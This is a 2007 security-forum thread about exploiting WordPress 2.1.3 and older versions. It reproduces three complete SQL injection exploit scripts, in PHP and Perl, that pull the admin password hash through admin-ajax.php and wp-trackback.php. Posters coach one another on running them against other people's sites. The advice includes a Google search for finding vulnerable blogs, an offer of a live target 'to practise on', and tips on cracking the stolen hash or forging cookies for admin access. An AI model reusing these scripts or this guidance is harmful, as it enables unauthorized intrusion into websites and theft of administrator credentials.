Waraxe IT Security Portal  
www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit ver. 2 (page 3 of 4)
PostPosted: Sat Jun 30, 2007 5:42 pm
scorpion
Regular user
Joined: Jun 20, 2007
Posts: 10

Okay, I have attacked a WP 2.1.3 installation with this script and I got dbff23c64c0369382f5fd24f69d03695 as the user_pass and admin as the user. I have gotten help with cracking this to: c71c34

Still, if I try to log in to that blog with username admin and pass c71c34 I just get a message that the login is incorrect. Why?

PostPosted: Sat Jul 14, 2007 6:15 pm
bittertruth
Regular user
Joined: Jul 11, 2007
Posts: 9

I first used the following exploit:
Code:
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://www.somedomain.com/wp-admin/admin-ajax.php';
$testcnt = 900000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

and it returns something like this:
Quote:
Target: http://www.somedomain.com/wp-admin/admin-ajax.php
sql table prefix: wp_
cookie suffix: be6e5691340cfc7e6fee375bd68894c3
testing probe delays

The exploit couldn't get past the "testing probe delays" message. I don't know where I went wrong.

I checked that somedomain.com and found it has no admin-ajax.php. So, after looking around for a while, I found an exploit for an older version, but it gave me some strange errors.

Could you please help me.

PostPosted: Sat Jul 14, 2007 10:32 pm
dnc
Regular user
Joined: Jul 09, 2007
Posts: 8
Location: USA

For all of those having trouble.
For Windows:
Install WAMP: www.wampserver.com/en/
Run it.
Left-click on the tray icon, select "PHP settings", then "PHP extensions", find "php_curl" in the list and select it. Close all menus. Once again click on the WAMP tray icon (it looks like a speedometer). This time select "Config Files", then "php.ini"; it will come up in Notepad or something. Press Ctrl+F, type "max" (no quotes), press Enter two times, and change max_execution_time to 999. Save the file. Once again select the tray icon and select "restart all services". Make sure you have the exploit saved as something.php in your wamp/www/ folder. Open Firefox and type localhost/something.php.

Oh, and to find a vulnerable site, type "is powered by WordPress 2.1.3" in Google.

PostPosted: Sun Jul 15, 2007 12:15 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Important notice - this exploit script is meant to be run as CLI!!!
Running it through apache is wrong. It is written for PHP Command Line Interface!

PostPosted: Sun Jul 15, 2007 1:05 am
dnc
Regular user
Joined: Jul 09, 2007
Posts: 8
Location: USA

Apparently it works. I don't read instructions... :P
But whatever.

PostPosted: Sun Jul 15, 2007 8:36 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Another exploit for WordPress 2.1.3. Tested, working very fine.

Code:
#!/usr/bin/perl -w

use LWP;
use POSIX qw(ceil floor);
use Digest::MD5 qw(md5_hex);
our $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; windows 5.1)',timeout=>10);
$|=1;

die("use: ./wpajax.pl http://localhost/wp/ wp_ [d]\n") if $#ARGV<1;

# WordPress suffixes its cookie names with the md5 of the site URL (without the trailing slash)
$cookiehash=md5_hex(substr($ARGV[0],0,-1));
print $cookiehash."\n";

# Boolean oracle: returns 1 when ORD(SUBSTRING(user_pass,$_[1],1)) > $_[0],
# which the script detects by the <div id='error'> marker in the admin-ajax.php response; else 0.
sub tpost{
$data='cookie=wordpressuser_'.$cookiehash.'=admin%2527 and IF(ORD(SUBSTRING(user_pass,'.$_[1].',1))>'.$_[0].',(select 1 from '.$ARGV[1].'options),0)/*; wordpresspass_'.$cookiehash.'%253dx';
$req = new HTTP::Request 'POST',$ARGV[0].'wp-admin/admin-ajax.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res=$ua->request($req);
$content=$res->content;
print $content."\n" if $ARGV[2];   # optional third argument: dump every response (debug)
if($content!~ m/<div id='error'>/){
return 0;
}
else{
return 1;
}}

@min=(48,97);    # '0', 'a'
@max=(57,102);   # '9', 'f'

for($a=1;$a<=32;$a++){             # one hex digit of the 32-char MD5 hash per iteration
if(tpost(60,$a)==0){               # ORD > 60 separates letters [a-f] from digits [0-9]
$n=$min[0];
$x=$max[0];
}
else{
$n=$min[1];
$x=$max[1];
}
$next=0;
while($next==0){                   # binary search between $n and $x
$num=floor($n+($x-$n)/2);
if(($x-$n)<2){
if(tpost($n,$a)==0){
$x=$n;
}
else{
$n=$x;
}}
else{
if(tpost($num,$a)==0){
$x=$num;
}
else{
$n=$num;
}}
if($n==$x){
print chr($x);
$next=1;
}}}
print "\n";

PostPosted: Sun Jul 15, 2007 9:00 am
bittertruth
Regular user
Joined: Jul 11, 2007
Posts: 9

Koko, I'm not so used to Perl; can you suggest me some working PHP exploits, or any workarounds to find whether the remote site is protected or not, rather than trying to execute exploits on and on and finding later that they don't work? Is it the only method to find out whether a site is protected/patched, or is there any way to find out beforehand, before executing exploits?

waraxe, are we not supposed to run it as dnc suggested? Or should we upload it to a remote FTP and run the script that way? I'm getting so confused, and reading notes off Google, they are so overwhelming..

PostPosted: Sun Jul 15, 2007 9:21 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Download and install ActivePerl if you don't have it. Go to Tools >> Folder Options >> File Types, find the PL extension and change it to use the Perl command line interpreter. Save the exploit to your PC. Open a cmd window and type the full path to the exploit: C:\scripts\blabla.pl victim.com/wordpress/ wp_ and just press Enter. I'll give you a working site in PM to practise on.

For PHP I use XAMPP. Go to the folder where PHP is. Right-click on the php folder and use this http://rapidshare.com/files/43009181/cmd_folder.reg.html (merge it into your system). Then when you right-click with the mouse you see "Open DOS here"; click it and cmd opens. Type php.exe C:\scripts\wordpress2.1.3.php and Enter.

PostPosted: Sun Jul 15, 2007 10:48 am
bittertruth
Regular user
Joined: Jul 11, 2007
Posts: 9

koko,
I've got Web Developer Server Suite v0.999 (beta) installed. It's just like WAMP or XAMPP but with many more add-ons, and it's easy to configure files through it. I'm a web designer, not a web developer, but for script testing purposes I use the Web Developer Suite.

You gave me a reference to the "Open DOS here" registry hack, which I normally do myself after a fresh install of XP or other Windows.
(Sorry, I'm not trying Perl for the time being.)

One thing is eating at me: isn't it the same thing running the PHP script from DOS mode (like you described) or from the browser at "http://localhost/..."?

And thanks for your PM, koko.

Besides, the PHP script below, as you (koko) wrote somewhere, is for an old version of WordPress. Will it work for WordPress 1.5? I'm assuming WordPress 1.5 because in the site's source I found something like <meta name="generator" content="WordPress 1.5" />, though the version was hidden on the front page of the site. I think it's WordPress 1.5, if I'm not wrong.

Code:
<?php
print_r('
---------------------------------------------------------------------------
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to wordpress
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)
Example:
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="wp_";

for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
  $prefix=str_replace("-t","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

echo "\npwd hash   -> ";
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        if (in_array($i,$chars))
        {
        $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
        }
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

echo "admin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
          $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

function is_hash($hash)
{
 if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
  echo "exploit succeeded...";
}
else {
  echo "exploit failed...";
  }

?>


From the code above, the details I entered were something like this:
Code:
Usage: php '.$argv[0].' host path OPTIONS
host:      something.com
path:      something.com/
Options:
 -p[port]:    81
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)

Have I done it correctly, or is there something missing?

And when I went to the WordPress official site (.org), I found the following file: http://wordpress.org/wordpress-1.5-strayhorn.md5
What is it for? Any clue? It was there in the download section. (I asked this stupid question because there are a lot of MD5 issues on this forum.)

Regards
PostPosted: Sun Jul 15, 2007 11:09 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

An easy way to check the WordPress version: open victim.com/wp-rss.php and look at the source code of the page.

I think this exploit doesn't work on WordPress 1.5. Check this for version 1.5:
http://milw0rm.com/search.php

PostPosted: Mon Jul 16, 2007 7:06 am
bittertruth
Regular user
Joined: Jul 11, 2007
Posts: 9

koko, thanks

I found it as 1.5.

I found some exploits for WordPress v1.5.1... (but not exactly for 1.5; I'm still searching for it) and so on, and hopefully executed them, but they return some errors again.

I tried these two exploits, and I followed the exact steps you showed to run .pl Perl files and it worked.
http://milw0rm.com/exploits/1033
http://milw0rm.com/exploits/1059

The errors I get on the command line are something like this:
1.
C:\www\perl\bin>perl C:\myadmin.pl -h http://www.somedomain.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WordPress 1.5.1.1 exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+---[x] STEP 1 - TRY GET ADMIN INFO
ERROR : Forum not vulnerable or bad prefix.

2.
C:\www\perl\bin>perl C:\attack.pl http://www.somedomain.com/ 1

====================================
= Exploit for WordPress <= 1.5.1.1 =
= by Alberto Trivero =
====================================

[+] Connected to: http://www.somedomain.com/
[-] Unable to retrieve username
[-] Unable to retrieve hash of password

PostPosted: Fri Jul 20, 2007 10:00 pm
buyviagra
Beginner
Joined: May 28, 2007
Posts: 1

waraxe wrote:
blaxenet wrote:
I've given the 'exploit' a run, but got the following error:

Code:
WordPress 2.1.3 blind sql injection exploit by waraxe
Target: http://www.site.com/wordpress/wp-admin/admin-ajax.php
sql table prefix: wp_
cookie suffix: 2554b2e3cc6c5f2f5bf434c94ad7987c
testing probe delays
test_md5delay(1) - invalid return value, exiting ...


I'm not sure if this is my fault or whether the version of Wordpress isn't correct.

Any idea's?
Thanks Smile


This can mean that the server issues a MySQL error message. I have seen such problems on some other websites too, and this can be related to a different SQL table structure, maybe because of some modifications in the WP installation. So first you must see what really happens there - try to change this exploit so that instead of the "probe delays test_md5delay(1)" diagnostic message it prints out all data coming from the server. Then, if it's an SQL error message, just adjust the exploit so that the SQL clause will be valid for that specific server.


Could you please go into depth on how to do this? I am receiving the same error.

PostPosted: Sat Sep 29, 2007 8:08 pm
Speller
Beginner
Joined: Sep 29, 2007
Posts: 2

to koko.
If I may, in Russian! ;)
I ran your exploit and two questions came up right away:
1. What do I do with this hash next? How do I turn it back into normal form?
2. Why do different delays give different hashes?

$testcnt = 10000:
User ID: 1
Hash: 20000200000002000000000000000000

$testcnt = 25000:
User ID: 1
Hash: 000ab000000000a00000001202300003

That is, it is different, and the bigger the delay the more complex it gets :?

PostPosted: Sat Sep 29, 2007 9:06 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Speller wrote:
to koko.
If I may, in Russian! ;)
I ran your exploit and two questions came up right away:
1. What do I do with this hash next? How do I turn it back into normal form?
2. Why do different delays give different hashes?

$testcnt = 10000:
User ID: 1
Hash: 20000200000002000000000000000000

$testcnt = 25000:
User ID: 1
Hash: 000ab000000000a00000001202300003

That is, it is different, and the bigger the delay the more complex it gets :?


My Russian is kinda rusty, so I prefer English.

1. If you can get the hash, then next you can try to crack it.
For example with Cain:

http://www.oxid.it/cain.html

Or you can just fake the cookies and get admin access without even knowing the actual password.
One more choice - post your hash here!

2. $testcnt must be bigger!! Maybe 300000, maybe 800000.
Slow server === bigger $testcnt!
Right now your exploit is not working as expected!

PostPosted: Sun Sep 30, 2007 4:51 am
BludD
Beginner
Joined: Sep 30, 2007
Posts: 4

Hi. I already got past retrieving the hash and the login name. The thing is that I don't have an idea where to go next. By the way, I already sent you a message with some more details. I hope you can help me with it. Thanks!